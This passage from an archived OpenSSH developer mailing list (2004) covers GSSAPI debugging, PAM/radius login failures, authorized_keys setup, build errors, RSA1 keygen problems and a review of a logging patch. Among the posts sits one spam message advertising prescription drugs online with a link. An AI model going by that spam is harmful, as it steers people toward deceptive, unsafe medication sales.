"sshd -ddd") would probably help too. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From fdprmypkxu at mail2Patricia.com Tue Mar 23 19:34:31 2004 From: fdprmypkxu at mail2Patricia.com (Rosie Salazar) Date: Tue, 23 Mar 2004 06:34:31 -0200 Subject: Forget the doctor, get pfwdscriptions online Message-ID: We now have the most popular meds available online The specials on Vicodin, Cialis, Xanax, Propecia, Levitra, etc etc are are available online for incredible-discount. This is a rare bargin-online, Get meds delivered to your doorstep. http://rainjo.com/r3/?d=vision -------------------------------------- To update your preference, please refer to the URL above From mark at mcs.vuw.ac.nz Tue Mar 23 20:24:25 2004 From: mark at mcs.vuw.ac.nz (Mark Davies) Date: Tue, 23 Mar 2004 21:24:25 +1200 Subject: gssapi, alpha's, OpenSSH 3.8p1 failing In-Reply-To: <405FD16E.40003@zip.com.au> References: <200403231722.56628.mark@mcs.vuw.ac.nz> <405FD16E.40003@zip.com.au> Message-ID: <200403232124.26141.mark@mcs.vuw.ac.nz> On Tuesday 23 March 2004 17:55, Darren Tucker wrote: > The entire server-side debugging (ie "sshd -ddd") would probably help too. OK, here it is: [...] debug1: userauth-request for user mark service ssh-connection method none debug1: attempt 0 failures 0 debug2: input_userauth_request: setting up authctxt for mark debug2: input_userauth_request: try method none Failed none for mark from 130.195.5.12 port 57640 ssh2 debug1: userauth-request for user mark service ssh-connection method gssapi-with-mic debug1: attempt 1 failures 1 debug2: input_userauth_request: try method gssapi-with-mic Postponed gssapi-with-mic for mark from 130.195.5.12 port 57640 ssh2 debug1: Got no client credentials Couldn't convert client name debug1: do_cleanup cheers mark From cfernandes at io.inf.br Tue Mar 23 21:58:48 2004 From: cfernandes at io.inf.br (System Anti-Virus Administrator) Date: 23 Mar 2004 10:58:48 -0000 Subject: virus encontrado em mensagem enviada "hey" Message-ID: Atencao: openssh-unix-dev at mindrot.org Um virus foi encontrado numa mensagem de Email que acabou de ser enviada por voce. Este scanner de Email a interceptou e impediu a mensagem de chegar no seu destino. O virus foi reportado como sendo: the W32/Netsky.c at MM!zip virus !!! Por favor atualize seu antivirus ou contate o seu suporte tecnico o mais rapido possivel pois voce tem um virus no seu computador. Sua mensagem foi enviada com o seguinte envelope: REMETENTE: openssh-unix-dev at mindrot.org DESTINATARIO: daniel at jfreire.com.br ... e com o seguinte cabecalho: --- MAILFROM: openssh-unix-dev at mindrot.org Received: from unknown (HELO jfreire.com.br) (200.17.67.2) by 0 with SMTP; 23 Mar 2004 10:58:43 -0000 From: openssh-unix-dev at mindrot.org To: daniel at jfreire.com.br Subject: hey Date: Tue, 23 Mar 2004 08:02:27 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0006_00001904.00001334" --- From gert at greenie.muc.de Tue Mar 23 22:57:41 2004 From: gert at greenie.muc.de (Gert Doering) Date: Tue, 23 Mar 2004 12:57:41 +0100 Subject: ssh only with password In-Reply-To: <20040321185315.GA28339@misery.proulx.com>; from bob@proulx.com on Sun, Mar 21, 2004 at 11:53:15AM -0700 References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> Message-ID: <20040323125741.G29714@greenie.muc.de> Hi, On Sun, Mar 21, 2004 at 11:53:15AM -0700, Bob Proulx wrote: > > Also, sometimes people do this with an text editor and accidentally > word wrap the file. Therefore I recommend simply appending them with > the shell and cat. These steps will correct any problems here. > > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak make that a "cp"... gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert at net.informatik.tu-muenchen.de From Paul.Abel at ditg.tv Wed Mar 24 03:18:59 2004 From: Paul.Abel at ditg.tv (Paul Abel) Date: Tue, 23 Mar 2004 16:18:59 -0000 Subject: OpenSSH and pam_radius_auth.so Message-ID: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> Hi, I have recently upgraded from OpenSSH-3.5 to OpenSSH-3.8 on my Red Hat 6.2 servers. I use radius (pam_radius_auth) for ssh authentication. Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to the conclusion that pam is skipping the radius section of the config file and is falling back to standard unix authentication. Is there any way of making ssh1 work with radius on recent versions of OpenSSH? Here is my pam config file: #%PAM-1.0 auth sufficient /lib/security/pam_radius_auth.so debug auth required /lib/security/pam_pwdb.so shadow nodelay auth required /lib/security/pam_nologin.so account sufficient /lib/security/pam_radius_auth.so account required /lib/security/pam_pwdb.so password sufficient /lib/security/pam_radius_auth.so password required /lib/security/pam_pwdb.so shadow nullok use_authtok session required /lib/security/pam_pwdb.so session required /lib/security/pam_limits.so Thanks, Paul Abel This E-mail message, including any attachments, is intended only for the person or entity to which it is addressed, and may contain confidential information. If you are not the intended recipient, any review, retransmission, disclosure, copying, modification or other use of this E-mail message or attachments is strictly forbidden. If you have received this E-mail message in error, please contact the author and delete the message and any attachments from your computer. You are also advised that the views and opinions expressed in this E-mail message and any attachments are the author's own, and may not reflect the views and opinions of Digital Interactive Television Group. From bob at proulx.com Wed Mar 24 05:41:03 2004 From: bob at proulx.com (Bob Proulx) Date: Tue, 23 Mar 2004 11:41:03 -0700 Subject: ssh only with password In-Reply-To: <20040323125741.G29714@greenie.muc.de> References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> Message-ID: <20040323184103.GA7928@misery.proulx.com> Gert Doering wrote: > Bob Proulx wrote: > > Also, sometimes people do this with an text editor and accidentally > > word wrap the file. Therefore I recommend simply appending them with > > the shell and cat. These steps will correct any problems here. > > > > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak > > make that a "cp"... Negative. Using 'cp' would not correct the problem with the original file. It would still be word wrapped. So 'mv' is better if you are trying to start again clean. Bob From gert at greenie.muc.de Wed Mar 24 08:25:04 2004 From: gert at greenie.muc.de (Gert Doering) Date: Tue, 23 Mar 2004 22:25:04 +0100 Subject: ssh only with password In-Reply-To: <20040323184103.GA7928@misery.proulx.com>; from bob@proulx.com on Tue, Mar 23, 2004 at 11:41:03AM -0700 References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com> Message-ID: <20040323222504.N29714@greenie.muc.de> Hi, On Tue, Mar 23, 2004 at 11:41:03AM -0700, Bob Proulx wrote: > > > Also, sometimes people do this with an text editor and accidentally > > > word wrap the file. Therefore I recommend simply appending them with > > > the shell and cat. These steps will correct any problems here. > > > > > > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak > > > > make that a "cp"... > > Negative. Using 'cp' would not correct the problem with the original > file. It would still be word wrapped. So 'mv' is better if you are > trying to start again clean. Well, I agree on that. Even so, your example isn't really consistent in itself - the next line uses "cat $singlefile >>authorized_keys" - so you'll have only *one* key in there, and the ">>" is no different from ">". That's why I assumed you meant "append new key to the end, but save the file in any case". gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert at net.informatik.tu-muenchen.de From Tom.V.Phan at saint-gobain.com Wed Mar 24 08:26:17 2004 From: Tom.V.Phan at saint-gobain.com (Phan, Tom V.) Date: Tue, 23 Mar 2004 13:26:17 -0800 Subject: Which file to use? Message-ID: <3BAA66E286E852419355A4FE6917844703209DC8@COI-3> To Whom It May Concern: We see three files, openssh-3.8pq.tar.ga, openssh-3.8p1.tar.gz.sig, and openssh-3.8p1-vs-openbsd.diff.gz Do we need one of these or a different file to load? Currently, we're running SCO UnixWare 7.1.1, and could upgrade to 7.1.3. Thanks for your help. -Tom Phan From agiri at sj.symbol.com Wed Mar 24 08:34:28 2004 From: agiri at sj.symbol.com (Amba giri) Date: Tue, 23 Mar 2004 13:34:28 -0800 Subject: A question on Compilation errors... Message-ID: Darren Thank you very much for your response. Yes- I will be upgrading to zlib 1.1.4. I have suceeded in completing a successful build of ssh and sshd on lynxos. Many thanks to you. I do have 2 further questions: 1. After configure and the first run of make-- I notice the that the make just hangs after displaying the following: if test ! -2 "yes"; then \ /usr/bin/perl ./fixpage ssh_prng_cmds; \ fi --- I then do a ^Z and a second invocation of make causes everything tho build and compile. What is causing this? 2. If I attempt to execute ssh and connect to my local IP address: I get the error: Couldn't exec /usr/local/libexec/ssh-rand-helper. This file does not exist on my system and I am wondering hw it gets built Thank you for the 3rd time :) Amba Amba giri wrote: > I am attempting to build on a LynxOS platform and am using a old > version of zlib and OpenSSL-0.9.6a. I get past the configure stage by > ignoring the zlib version check. However, at make stage I run into the > following undefineds. Any idea what may be causing this. I am using > version 3.8p1 of OpenSSH. Any reason you don't use newer zlib and openssl? You'll probably save yourself problems down the line. [...] > (cd openbsd-compat && make) > make[1]: Nothing to be done for `all'. > gcc -o ssh ssh.o readconf.o clientloop.o sshtty.o sshconnect.o > sshconnect1.o sshconnect2.o -L. > -Lopenbsd-compat/ -L/usr/local/ssl/lib -lssh -lopenbsd-compat > -lcrypto -lz > collect2: ld returned 1 exit status > readconf.o: In function `parse_token': > /openssh-3.8p1/readconf.c(263): undefined reference to `strcasecmp' [...] That is usually in libc. If your libc doesn't have it, you could probably borrow an implementation from OpenBSD's libc. > /openssh-3.8p1/sshconnect.c(243): undefined reference to `howmany' This is a macro defined in defines.h if MISSING_HOWMANY is defined. Try adding "#define MISSING_HOWMANY 1" to config.h. > ./libssh.a(log.o): In function `do_log': > /openssh-3.8p1/log.c(329): undefined reference to `openlog' > /openssh-3.8p1/log.c(330): undefined reference to `syslog' > /openssh-3.8p1/log.c(331): undefined reference to `closelog' No idea where you'd find this if it's not in libc. Check the OS documentation. [...] > /openssh-3.8p1/openbsd-compat/fake-rfc2553.c(164): undefined reference > to `getservbyname' [..] These are normally in libresolv. Try adding "-lresolv" to LDFLAGS. I suggest you add a *-lynxos) section to configure.ac with the required bits. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. ________________________________________________________________________ This email has been scanned for computer viruses. Amba Giri Symbol Technologies, San Jose P: 408-528-2721 E:agiri at sj.symbol.com Symbol. The Enterprise Mobility Company. From chris at obelix.hedonism.cx Wed Mar 24 09:03:47 2004 From: chris at obelix.hedonism.cx (Christian Vogel) Date: Tue, 23 Mar 2004 23:03:47 +0100 Subject: OpenSSH and pam_radius_auth.so In-Reply-To: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk>; from Paul.Abel@ditg.tv on Tue, Mar 23, 2004 at 04:18:59PM -0000 References: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> Message-ID: <20040323230347.A7395@obelix.frop.org> Hi Paul, On Tue, Mar 23, 2004 at 04:18:59PM -0000, Paul Abel wrote: > Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to > the conclusion that pam is skipping the radius section of the config > file and is falling back to standard unix authentication. have you compiled openssh using --with-pam? Is there any sign of pam being used in /var/log/*? > This E-mail message, including any attachments, is intended only blah.. blah... blah... Chris -- Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -- Rich Cook From djm at mindrot.org Wed Mar 24 10:35:49 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 24 Mar 2004 10:35:49 +1100 Subject: OpenSSH and pam_radius_auth.so In-Reply-To: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> References: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> Message-ID: <4060C9D5.9040802@mindrot.org> Paul Abel wrote: > Hi, > > I have recently upgraded from OpenSSH-3.5 to OpenSSH-3.8 on my Red Hat 6.2 servers. I use radius (pam_radius_auth) for ssh authentication. Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to the conclusion that pam is skipping the radius section of the config file and is falling back to standard unix authentication. > > Is there any way of making ssh1 work with radius on recent versions of OpenSSH? Have you turned on "TIS" authentication in PuTTY? IIRC it is off by default. -d From djm at mindrot.org Wed Mar 24 10:38:15 2004 From: djm at mindrot.org (Damien Miller) Date: Wed, 24 Mar 2004 10:38:15 +1100 Subject: Which file to use? In-Reply-To: <3BAA66E286E852419355A4FE6917844703209DC8@COI-3> References: <3BAA66E286E852419355A4FE6917844703209DC8@COI-3> Message-ID: <4060CA67.3050909@mindrot.org> Take your pick: openssh-3.8p1.tar.gz - The actual source code distribution openssh-3.8p1.tar.gz.sig - An OpenPGP signature of the above openssh-3.8p1-vs-openbsd.diff.gz - The changes relative to OpenBSD Phan, Tom V. wrote: > To Whom It May Concern: > > We see three files, openssh-3.8pq.tar.ga, openssh-3.8p1.tar.gz.sig, and > openssh-3.8p1-vs-openbsd.diff.gz > Do we need one of these or a different file to load? Currently, we're > running SCO UnixWare 7.1.1, and could upgrade to 7.1.3. > Thanks for your help. > -Tom Phan > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev From mhaverkamp at kcp.com Wed Mar 24 03:56:49 2004 From: mhaverkamp at kcp.com (Michael Haverkamp) Date: Tue, 23 Mar 2004 10:56:49 -0600 Subject: OpenSSH and pam_radius_auth.so In-Reply-To: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> References: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> Message-ID: <40606C51.4030807@kcp.com> Is upgrading PuTTY an option? I have had problems with PuTTY 0.52 and recent versions of OpenSSH. I believe it is because PuTTY 0.52 does not support KbdInteractive. PuTTY 0.53b or newer should work. Paul Abel wrote: > Hi, > > I have recently upgraded from OpenSSH-3.5 to OpenSSH-3.8 on my Red Hat 6.2 servers. I use radius (pam_radius_auth) for ssh authentication. Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to the conclusion that pam is skipping the radius section of the config file and is falling back to standard unix authentication. > > Is there any way of making ssh1 work with radius on recent versions of OpenSSH? > > Here is my pam config file: > > #%PAM-1.0 > auth sufficient /lib/security/pam_radius_auth.so debug > auth required /lib/security/pam_pwdb.so shadow nodelay > auth required /lib/security/pam_nologin.so > account sufficient /lib/security/pam_radius_auth.so > account required /lib/security/pam_pwdb.so > password sufficient /lib/security/pam_radius_auth.so > password required /lib/security/pam_pwdb.so shadow nullok use_authtok > session required /lib/security/pam_pwdb.so > session required /lib/security/pam_limits.so > > Thanks, > Paul Abel > > > This E-mail message, including any attachments, is intended only for the person or entity to which it is addressed, and may contain confidential information. If you are not the intended recipient, any review, retransmission, disclosure, copying, modification or other use of this E-mail message or attachments is strictly forbidden. If you have received this E-mail message in error, please contact the author and delete the message and any attachments from your computer. You are also advised that the views and opinions expressed in this E-mail message and any attachments are the author's own, and may not reflect the views and opinions of Digital Interactive Television Group. > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev -- Michael Haverkamp From markus_moeller at compuserve.com Wed Mar 24 11:34:23 2004 From: markus_moeller at compuserve.com (Markus Moeller) Date: Wed, 24 Mar 2004 00:34:23 -0000 Subject: GSSAPI patch for multihomed hosts Message-ID: <000801c41137$c51d1ef0$fa00a8c0@home> Hi, This is another attempt to get my gssapi for multi homed systems into openssh. Please find attach a small change so that gssapi authentication works on multihomed systems. Regards Markus -------------- next part -------------- A non-text attachment was scrubbed... Name: openssh-3.8p1-mm.diff Type: application/octet-stream Size: 3599 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040324/41cbc9e0/attachment.obj From imhaeuse at physik.uni-wuppertal.de Wed Mar 24 18:28:17 2004 From: imhaeuse at physik.uni-wuppertal.de (Martin Imhaeuser) Date: Wed, 24 Mar 2004 08:28:17 +0100 Subject: ssh only with password References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com> <20040323222504.N29714@greenie.muc.de> Message-ID: <40613891.1080906@physik.uni-wuppertal.de> Hi all, first thank you for help. But nothing works. * I have deleted all files in my home directory and started again fresh. * I have taken the commands "mv" and "cat" and checked the permissions. Further the remote machine and the local machine are the same. I login as imhaeuse (user) on milaptop (machine), open a shell, type exec ssh-agent $SHELL and ssh-add, give my passphrase and finally type ssh imhaeuse at milaptop. This should be the moment where my password is not needed any longer. BUT I must enter my password. The funny thing is when I login as root on milaptop the procedure is working meaning that I must not enter my password for root. Following you see my context in the shell afer the command "ssh milaptop -vvv": [imhaeuse at milaptop imhaeuse]$ ssh milaptop -vvv OpenSSH_3.4p1-CERN20020919, SSH protocols 1.5/2.0, OpenSSL 0x0090602f debug1: Reading configuration data /etc/ssh/ssh_config debug1: Applying options for * debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: ssh_connect: needpriv 0 debug1: Connecting to milaptop [127.0.0.1] port 22. debug1: Connection established. debug1: identity file /home/imhaeuse/.ssh/identity type 0 debug1: identity file /home/imhaeuse/.ssh/id_rsa type -1 debug1: identity file /home/imhaeuse/.ssh/id_dsa type -1 debug1: Remote protocol version 1.99, remote software version OpenSSH_3.4p1-CERN20020919 debug1: match: OpenSSH_3.4p1-CERN20020919 pat OpenSSH* debug1: Local version string SSH-1.5-OpenSSH_3.4p1-CERN20020919 debug1: Waiting for server public key. debug1: Received server public key (768 bits) and host key (1024 bits). debug3: check_host_in_hostfile: filename /home/imhaeuse/.ssh/known_hosts debug3: check_host_in_hostfile: match line 1 debug1: Host 'milaptop' is known and matches the RSA1 host key. debug1: Found key in /home/imhaeuse/.ssh/known_hosts:1 debug1: Encryption type: 3des debug1: Sent encrypted session key. debug1: cipher_init: set keylen (16 -> 32) debug1: cipher_init: set keylen (16 -> 32) debug1: Installing crc compensation attack detector. debug1: Received encrypted confirmation. debug1: Trying Kerberos v5 authentication. debug3: Trying to reverse map address 127.0.0.1. debug1: Kerberos v5: krb5_mk_req failed: No credentials cache found debug1: Trying Kerberos v4 authentication. debug1: Kerberos v4: no ticket file /tmp/tkt500 debug1: Trying RSA authentication via agent with 'imhaeuse at milaptop' debug1: Server refused our key. debug1: RSA authentication using agent refused. debug1: Trying RSA authentication with key '/home/imhaeuse/.ssh/identity' debug1: Server refused our key. debug1: Doing password authentication. imhaeuse at milaptop's password: Has somebody an idea what is wrong with my system? Cheers, Martin From Vikash.Badal at Comparex.co.za Wed Mar 24 19:47:52 2004 From: Vikash.Badal at Comparex.co.za (Vikash Badal - PCS) Date: Wed, 24 Mar 2004 10:47:52 +0200 Subject: Request for comment, logging patch Message-ID: <25DB50FA9257E24AA165033FD431024D6DF492@dxpsi01.africa.enterprise.root> Greetings. Attached is a patch that provides more logging information for example: Mar 19 08:34:54 secosr5 sshd[7667]: Accepted publickey of? vix at wormhole for root from 192.168.1.1 port 1256 ssh2 Mar 19 08:34:54 secosr5 sshd[7667]: executing command 'who' for? vix at wormhole as user root Mar 19 10:37:16 secosr5 sshd[7725]: Accepted publickey of? vix at wormhole for root from 192.168.1.1 port 1257 ssh2 Mar 19 10:37:16 secosr5 sshd[7725]: executing command 'scp -f /usr/udd1/dev/openssh-3.8p1.patch' for? vix at wormhole as user root Can this code be reviewed and possibly added to the code base ? Please let me know what is incorrect with this code. Thanks Vikash -------------- next part -------------- A non-text attachment was scrubbed... Name: openssh-3.8p1.patch.gz Type: application/x-gzip Size: 1887 bytes Desc: openssh-3.8p1.patch.gz Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040324/3a4207a0/attachment.bin From mark at mcs.vuw.ac.nz Wed Mar 24 20:26:20 2004 From: mark at mcs.vuw.ac.nz (Mark Davies) Date: Wed, 24 Mar 2004 21:26:20 +1200 Subject: gssapi, alpha's, OpenSSH 3.8p1 failing In-Reply-To: <200403231722.56628.mark@mcs.vuw.ac.nz> References: <200403231722.56628.mark@mcs.vuw.ac.nz> Message-ID: <200403242126.20023.mark@mcs.vuw.ac.nz> On Tuesday 23 March 2004 17:22, Mark Davies wrote: > So can anyone suggest if this is an OpenSSH bug (alpha 64bit issue?) or a > problem with the older Heimdal? And how can I fix this? To answer my own question - its a Heimdal issue. Rebuilding with Heimdal 0.6 fixed it in both cases. cheers mark From kumaresh_ind at gmx.net Wed Mar 24 20:30:51 2004 From: kumaresh_ind at gmx.net (Kumaresh) Date: Wed, 24 Mar 2004 15:00:51 +0530 Subject: SSH RSA1 keygen error with OpenSSL-0.9.7d References: <004101c40d99$a1e6a060$230110ac@kurco> <405BD603.9010308@zip.com.au> Message-ID: <037b01c41182$e052a5f0$230110ac@kurco> > Kumaresh wrote: > > I have compiled OpenSSL-0.9.7d - the lastest version and when > > OpenSSH-3.7.1p2 is compiled with this ssl library [0.9.7d], I am getting the > > following error when SSH-1 connection is done. > > I am using HP-UX IPF box and > > I am doing 32 bit compilation only. Even I have changed the optimization > > level for OpenSSL and no use. > > Does OpenSSL's "make test" self-test pass? Thanks Darren. The tests failed with BN_XXX tests. This was an issue with the optimization level when OpenSSL was built. The default optimization was +03 and this was changed to +01 and it worked now. But, now there is another problem in SSH-1 when I compiled OpenSSH-3.7.1p2 with OpenSSL-0.9.7d. [The "make test" in OpenSSL passed]. When I generate RSA1 key with the new ssh-keygen [with OpenSSL-0.9.7d], # ssh-keygen -b 1024 -t rsa1 -f /.ssh/identity The key created [in /.ssh/identity.pub], looks like: 1024 0 000000000100............. This is an invalid key. The exponent cannot be 0. So the SSH-1 connection with RSA authentication is not working. But, other keys like DSA and RSA works fine as the keys generated are proper and so there are no issues with SSH-2. If I generate the key using the older build, i.e., OpenSSH-3.7.1p2 built with OpenSSL-0.9.7c, the key for RSA1 is: 1024 35 150857062..... Any ideas? Advance thanks, Kumaresh. --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004 From dtucker at zip.com.au Wed Mar 24 22:48:38 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 24 Mar 2004 22:48:38 +1100 Subject: SSH RSA1 keygen error with OpenSSL-0.9.7d In-Reply-To: <037b01c41182$e052a5f0$230110ac@kurco> References: <004101c40d99$a1e6a060$230110ac@kurco> <405BD603.9010308@zip.com.au> <037b01c41182$e052a5f0$230110ac@kurco> Message-ID: <40617596.8080702@zip.com.au> Kumaresh wrote: > Thanks Darren. The tests failed with BN_XXX tests. > This was an issue with the optimization level when OpenSSL was built. The > default optimization was +03 and this was changed to +01 and it worked now. > > But, now there is another problem in SSH-1 when I compiled OpenSSH-3.7.1p2 > with OpenSSL-0.9.7d. [The "make test" in OpenSSL passed]. > > When I generate RSA1 key with the new ssh-keygen [with OpenSSL-0.9.7d], > # ssh-keygen -b 1024 -t rsa1 -f /.ssh/identity > > The key created [in /.ssh/identity.pub], looks like: > 1024 0 000000000100............. > > This is an invalid key. The exponent cannot be 0. This does not fill me with confidence that OpenSSL is working properly :-) Does "openssl genrsa" work? Try openssl genrsa >tmpkey openssl rsa -check -noout References: <25DB50FA9257E24AA165033FD431024D6DF492@dxpsi01.africa.enterprise.root> Message-ID: <40616EAA.30605@zip.com.au> Vikash Badal - PCS wrote: > Greetings. > > Attached is a patch that provides more logging information > for example: > Mar 19 08:34:54 secosr5 sshd[7667]: Accepted publickey of vix at wormhole for root from 192.168.1.1 port 1256 ssh2 > Mar 19 08:34:54 secosr5 sshd[7667]: executing command 'who' for vix at wormhole as user root > Mar 19 10:37:16 secosr5 sshd[7725]: Accepted publickey of vix at wormhole for root from 192.168.1.1 port 1257 ssh2 > Mar 19 10:37:16 secosr5 sshd[7725]: executing command 'scp -f /usr/udd1/dev/openssh-3.8p1.patch' for vix at wormhole as user root > > Can this code be reviewed and possibly added to the code base ? > Please let me know what is incorrect with this code. > +extern char realname[64]; "realname" is populated with a copy of the address part of the comment in the key. Firstly, I'm not keen on logging too much user-controlled data, and there's no reason why the comment won't be longer than 64 chars... If you must log it, you should probably run it through strnvis to escape any nasties. > /* cp now points to the comment part. */ > + comment = cp; > + commentlen = strlen(comment); > + if (commentlen > 0 && comment[commentlen -1] == '\n') > + comment[commentlen - 1] = '\0'; You're modifying the source string, although it looks like you're trying not to (comment and cp are just pointers that point to the same chunk of memory). You should probably use xstrdup (but see above). +extern char user_name[16]; > + strncpy(user_name, authctxt->user, sizeof(user_name) -1 ); Is it really neccessary to keep another copy of the_authctxt->user? And what guarantee is there that it's less than 16 chars? -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From Vikash.Badal at Comparex.co.za Wed Mar 24 23:34:34 2004 From: Vikash.Badal at Comparex.co.za (Vikash Badal - PCS) Date: Wed, 24 Mar 2004 14:34:34 +0200 Subject: Request for comment, logging patch Message-ID: <25DB50FA9257E24AA165033FD431024D01C722@dxpsi01.africa.enterprise.root> Greetings, > -----Original Message----- > From: Darren Tucker [mailto:dtucker at zip.com.au] > Sent: 24 March 2004 01:19 > To: Vikash Badal - PCS > Cc: openssh-unix-dev at mindrot.org > Subject: Re: Request for comment, logging patch > > > Vikash Badal - PCS wrote: > > Greetings. > > < ... SNIP> > in the key. Firstly, I'm not keen on logging too much > user-controlled > data, and there's no reason why the comment won't be longer > than 64 chars... > In my haste to get this working, i took an arbitrary value > If you must log it, you should probably run it through > strnvis to escape > any nasties. will definitely learn more about this > > > /* cp now points to the comment part. */ > > + comment = cp; > > + commentlen = strlen(comment); > > + if (commentlen > 0 && comment[commentlen -1] == '\n') > > + comment[commentlen - 1] = '\0'; > > You're modifying the source string, although it looks like > you're trying > not to (comment and cp are just pointers that point to the > same chunk of > memory). You should probably use xstrdup (but see above). > Thanks, I will work on this. > +extern char user_name[16]; > > + strncpy(user_name, authctxt->user, sizeof(user_name) -1 ); > > Is it really neccessary to keep another copy of > the_authctxt->user? And > what guarantee is there that it's less than 16 chars? this part is from my ignorance of coding, sorry, still got a lot to learn. Thanks for the feedback, I will work with the comments you have provided and hopefully learn more. I have no idea if this was a good idea or not, but in the environment in which i administer systems, user accounts are shared ( i know it's stupid, but i have no power over this). Thanks again, I have certainly gained some knowledge at the very least. Vikash From niclas.c.backman at ericsson.com Thu Mar 25 01:05:38 2004 From: niclas.c.backman at ericsson.com (=?iso-8859-1?Q?Niclas_B=E4ckman_C_=28LI/EAB=29?=) Date: Wed, 24 Mar 2004 15:05:38 +0100 Subject: Where does the "prompt come from" Message-ID: Hi All ! I have a little question about the shell that is run when establishing a connection towards an SSH server. The client(OpenSSH) displays a prompt(as usual) when a command is executed, but my question is, where does the prompt come from. Is it sent by the remote shell or is it handled in the client ?? The reason I ask is that we have developed a product that redirects stdin/stdout/stderr from the ssh binary to a socket, and we then perform socket read/writes directly into the ssh tunnel. But when i perform a command, the prompt is never read up from the server. So it's difficult to know when a remote script is finished. Using the same solution but towards a telnet server always results in a prompt back to the client. I would be most greatful for any good ideas/hints in this case. Thanks in advance !! e Niclas B?ckman Software Design | OMSec - team SSH Ericsson AB Center for Radio Network Control Box 1248 581 12 Link?ping Sweden New e-mail address: > * E-mail: : Niclas.c.Backman at ericsson.com Please Update your address book. > * Phone : +46 13 287604 > * Mobile : +46 73 0435819 > > This communication is confidential and intended solely for the addressee(s). Any unauthorized review, use, disclosure or distribution is prohibited. If you believe this message has been sent to you in error, please notify the sender by replying to this transmission and delete the message without disclosing it. Thank you. E-mail including attachments is susceptible to data corruption, interruption, unauthorized amendment, tampering and viruses, and we only send and receive e-mails on the basis that we are not liable for any such corruption, interception, amendment, tampering or viruses or any consequences thereof. From bob at proulx.com Thu Mar 25 05:07:18 2004 From: bob at proulx.com (Bob Proulx) Date: Wed, 24 Mar 2004 11:07:18 -0700 Subject: ssh only with password In-Reply-To: <20040323222504.N29714@greenie.muc.de> References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com> <20040323222504.N29714@greenie.muc.de> Message-ID: <20040324180718.GA7853@misery.proulx.com> Gert Doering wrote: > Bob Proulx wrote: > > > > Also, sometimes people do this with an text editor and accidentally > > > > word wrap the file. Therefore I recommend simply appending them with > > > > the shell and cat. These steps will correct any problems here. > > > > > > > > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak > > > > > > make that a "cp"... > > > > Negative. Using 'cp' would not correct the problem with the original > > file. It would still be word wrapped. So 'mv' is better if you are > > trying to start again clean. > > Well, I agree on that. Even so, your example isn't really consistent in > itself - the next line uses "cat $singlefile >>authorized_keys" - so > you'll have only *one* key in there, and the ">>" is no different from > ">". > > That's why I assumed you meant "append new key to the end, but save the > file in any case". People tend to save snippets like that in files of notes and use them later out of context by cut-n-paste. My use of >> was just paranoia. If later someone decides to use that line to add another key to the file (after all, that is how they added the first key) then it won't overwrite their file at that later time and possibly lock themselves out of a system. Bob From v_t_m at seznam.cz Thu Mar 25 08:52:26 2004 From: v_t_m at seznam.cz (=?iso-8859-2?Q?V=E1clav=20Tomec?=) Date: Wed, 24 Mar 2004 22:52:26 +0100 (CET) Subject: PATCH: GSSAPI authentication in 